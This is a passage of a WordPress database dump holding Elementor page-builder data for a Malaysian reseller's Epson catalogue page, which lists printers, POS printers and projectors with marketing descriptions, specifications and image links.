]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d5e60a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b6a1050\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(7811,3459,'_elementor_version','2.5.14'),(7814,3460,'_wp_page_template','template-fullwidth.php'),(7815,3460,'_elementor_edit_mode','builder'),(7816,3460,'_elementor_template_type','post'),(7817,3460,'_elementor_data','[{\"id\":\"0bcf275\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"829ac8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2449815\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.<\\/p><h2>Printers for Work<\\/h2><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2698f52\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"93fa1d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f872ca9\",\"elType\":\"widget\",\"settings\":{\"title\":\"BUSINESS INKJET PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2a74bb0\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"245ffff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"12a92f5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce Enterprise WF-C17590\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2417\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Enterprise-WF-C17590.jpg\\\" alt=\\\"\\\" width=\\\"366\\\" height=\\\"207\\\" \\/><\\/p><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCore\\u2122, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.<\\/p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax<\\/li><li>Ink: DURABrite<sup>TM<\\/sup>\\u00a0Pro pigment ink cartridges<\\/li><li>ISO Print Speed: 75 ISO ppm (black\\/colour) simplex\\/duplex<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"d99a531\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"51d6ae3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3a12efc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ffeb9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce Pro WF-C5290\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2418\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Pro-WF-C5290.png\\\" alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.<\\/p><ul><li>High yield ink packs<\\/li><li>High-speed auto-duplex printing<\\/li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li><li>Epson Connect<\\/li><li>Energy\\u00a0saving<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c9f78e3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"94b61d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b740aaa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce WF-100\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2419\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-100.png\\\" alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.<\\/p><ul><li>Print speed up to 14 ppm<\\/li><li>Epson Connect<\\/li><li>1.44 Colour LCD Panel<\\/li><li>Wi-Fi and Wi-Fi Direct connectivity<\\/li><li>Built-in battery<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"96730a6\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":49,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"addc0f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2b0e3f9\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"e754d94\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fc3866b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce WF-7711<\\/strong><\\/h4>\\n<img class=\\\"wp-image-2420 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-7711.png\\\" alt=\\\"\\\" width=\\\"304\\\" height=\\\"172\\\" \\/><br>\\n\\nChange the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM<\\/sup>\\u00a0technology, fast printing speed consistently delivers success in every detail.\\n<ul>\\n \\t<li>Print speeds up to 18ipm for black and 10ipm for colour<\\/li>\\n \\t<li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li>\\n \\t<li>Duplex printing up to A3 size<\\/li>\\n \\t<li>Epson DURABrite<sup>TM<\\/sup>\\u00a0Ultra ink<\\/li>\\n \\t<li>4.3\\u201d Colour LCD Touch Panel<\\/li>\\n \\t<li>Print, Scan, Copy Fax with ADF<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5178d20\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b031280\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"b3a013d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f2b7b04\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c71ec36\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"732a1a6\",\"elType\":\"widget\",\"settings\":{\"title\":\"INK TANK SYSTEM\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e709cb3\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"60cd262\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97d2102\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EcoTank L3150<\\/strong><\\/h4><p><img class=\\\"wp-image-2421 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EcoTank-L3150-.jpg\\\" alt=\\\"\\\" width=\\\"311\\\" height=\\\"175\\\" \\/><\\/p><p>Save more with Epson\\u2019s economical and multifunctional printing solutions for business\\u2014the EcoTank L3150\\u2014built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High yield ink bottles<\\/li><li>Spill-free, error-free refilling<\\/li><li>Wi-Fi, Wi-Fi Direct<\\/li><li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)<\\/li><li>Borderless printing up to 4R<\\/li><\\/ul><div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"63366b2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8449cce\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson L120 Printer\\u00a0<\\/strong><br \\/><br \\/><img class=\\\"alignnone wp-image-2422\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L120-Printer.png\\\" alt=\\\"\\\" width=\\\"301\\\" height=\\\"170\\\" \\/><\\/h4><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.<\\/p><ul><li>High-yield ink bottles<\\/li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color<\\/li><li>Compact Size<\\/li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9109035\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":164,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"140f583\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7d56d33\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a539e2b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson M1100 Printer<\\/strong><\\/h4><p><img class=\\\"wp-image-2423 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-M1100-Printer-.png\\\" alt=\\\"\\\" width=\\\"315\\\" height=\\\"178\\\" \\/><\\/p><p>Efficiency\\u00a0meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pages\\u00a0each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High-yield pigment ink bottle<\\/li><li>Spill-free, error-free refilling<\\/li><li>Print speed up to 32ppm (15ipm)<\\/li><li>4 years warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e74569a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"e157d4e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ffcc87\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c140b6d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0c8225a\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"b3a6fcb\",\"elType\":\"widget\",\"settings\":{\"title\":\"LASER PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a7c8449\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"650cf58\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"82105a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson AcuLaser C9300N<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2424\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-AcuLaser-C9300N.png\\\" alt=\\\"\\\" width=\\\"313\\\" height=\\\"177\\\" \\/><\\/p><p>The Epson AcuLaser\\u2122 C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.<\\/p><ul><li>1200 x 1200 dpi<\\/li><li>Speed: Up to 30ppm<\\/li><li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)<\\/li><li>Quality prints with new Epson Technologies<\\/li><li>New print job management features<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ee8d71a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"28\",\"right\":\"28\",\"bottom\":\"28\",\"left\":\"28\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"8295a6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"22e2324\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\">\\u00a0<strong>Epson WorkForce AL-M320DN\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2426\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M320DN-.jpg\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"296\\\" \\/><\\/p><p>The Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.<\\/p><ul><li>1200 x 1200 dpi<\\/li><li>Print speed up to 35ppm<\\/li><li>Auto-Duplex<\\/li><li>Ethernet &amp; Epson iPrint<\\/li><li>2 optional paper cassette tray<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e06a550\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"49ae59d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6612146\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce AL-M8100DN\\u00a0<\\/strong><br \\/><br \\/><img class=\\\"alignnone wp-image-2427\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M8100DN-.png\\\" alt=\\\"\\\" width=\\\"256\\\" height=\\\"144\\\" \\/><\\/h4><p><br \\/><br \\/>Unleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.<\\/p><ul><li>1200 x 1200 dpi<\\/li><li>Print speed up to 40 ppm<\\/li><li>Epson iPrint<\\/li><li>Ethernet<\\/li><li>4 optional cassette trays<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"3432510\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"69\",\"right\":\"69\",\"bottom\":\"69\",\"left\":\"69\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3590c0\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7139e3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"77f919a\",\"elType\":\"widget\",\"settings\":{\"title\":\"POS PRINTER\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6011ab1\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"751b93e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"14d70f4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson TM-H6000IV\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2428\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-H6000IV.png\\\" alt=\\\"\\\" width=\\\"224\\\" height=\\\"125\\\" \\/><\\/p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.<\\/p><ul><li>Thermal &amp; Dot Output<\\/li><li>Speed: Up to 300mm\\/sec<\\/li><li>Check printing<\\/li><li>Bi-directional printing<\\/li><li>Supports\\u00a0slip printing, validation and endorsement print<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"48313a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"04c8d3f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson TM-T88V-i\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2429\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T88V-i.png\\\" alt=\\\"\\\" width=\\\"243\\\" height=\\\"137\\\" \\/><\\/p><p>Create a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.<\\/p><ul><li>Printing speed of up to 300mm\\/second<\\/li><li>20 million lines for printer mechanism<\\/li><li>Up to 2 million for auto-cutter<\\/li><li>LAN, Serial, USB 2.0 (Type A) x 4<\\/li><li>Control peripherals easily<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a458653\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"693238f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson TM-T70II\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2430\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T70II.png\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"143\\\" \\/><\\/p><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.<\\/p><ul><li>Print method: Thermal line printing<\\/li><li>Width: 79\\u00a0\\u00b1\\u00a00.5 mm<\\/li><li>Print Speed: Up to 250 mm\\/ sec<\\/li><li>Auto-cutter feature<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"633089e\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e7998e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ca5c009\",\"elType\":\"widget\",\"settings\":{\"title\":\"PHOTO PRINTER\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e7182b\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"7eee589\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c63255\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson L1800 A3 Photo Ink Tank Printer<\\/strong><\\/p><p><img class=\\\"alignnone size-full wp-image-2431\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L1800-Printer.png\\\" alt=\\\"\\\" width=\\\"550\\\" height=\\\"310\\\" \\/><\\/p><p>In creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.<\\/p><ul><li>Yield of up to 1,500 4R photos<\\/li><li>Print speed up to 15ppm<\\/li><li>High-yield ink bottles<\\/li><li>1-year warranty or 9,000 prints<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4abe3ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9645bf2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson L850 Printer\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2432\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L850-Printer.png\\\" alt=\\\"\\\" width=\\\"261\\\" height=\\\"147\\\" \\/><\\/p><p>Imaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.<\\/p><ul><li>High-yield ink bottles<\\/li><li>2.7 colour LCD screen<\\/li><li>Direct printing via memory card slot, USB port and PictBridge<\\/li><li>CD\\/DVD printing<\\/li><li>Warranty of 1 year or 3,000 photo prints, whichever comes first<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"07c207b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8ce4aa3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson L805 Printer\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2433\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L805-Printer-.png\\\" alt=\\\"\\\" width=\\\"240\\\" height=\\\"135\\\" \\/><\\/p><p>The L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.<\\/p><ul><li>Yield of Up to 1,800 4R photos<\\/li><li>Lowest Printing Costs<\\/li><li>Wi-Fi &amp; Epson iPrint<\\/li><li>CD\\/DVD Printing Capability<\\/li><li>1 year or 3,000 prints warranty<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"65279bf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c65e6e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"57b8f7e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Projectors for Work\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bbe338f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4e4173d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"1c6bf5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"CORPORATE AND EDUCATION\\u00a0\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7e9242e\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"61d6693\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"bd3c8b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-2055<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2434\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2055.png\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"163\\\" \\/><\\/p><p>Leave the lights on and take control whether in the meeting room or classroom. Epson\\u2019s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.<\\/p><ul><li>XGA Resolution<\\/li><li>White and Colour Light Output at 5,000 lumens<\\/li><li>Gesture Presenter<\\/li><li>Multi-PC Projection<\\/li><li>2 x HDMI<\\/li><li>Split Screen<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9b5eee\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe4d6fd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-2142W<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2435\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2142W.jpg\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"138\\\" \\/><\\/p><p>Enjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.<\\/p><ul><li>White and Colour Brightness at 4,200lm<\\/li><li>WXGA Resolution<\\/li><li>12000 hours lamp life in eco-mode<\\/li><li>MHL-enabled<\\/li><li>Multi-PC Projection<\\/li><li>Horizontal Keystone Slider<\\/li><li>Miracast<sup>\\u00ae<\\/sup><\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<span style=\\\"font-size: 10.5px;\\\"><br \\/><\\/span><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"24b65ae\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a26a32f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-L500W\\u00a0<\\/strong><img class=\\\"wp-image-2436 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-L500W.jpg\\\" alt=\\\"\\\" width=\\\"251\\\" height=\\\"142\\\" \\/><\\/p><p>The compact, affordable 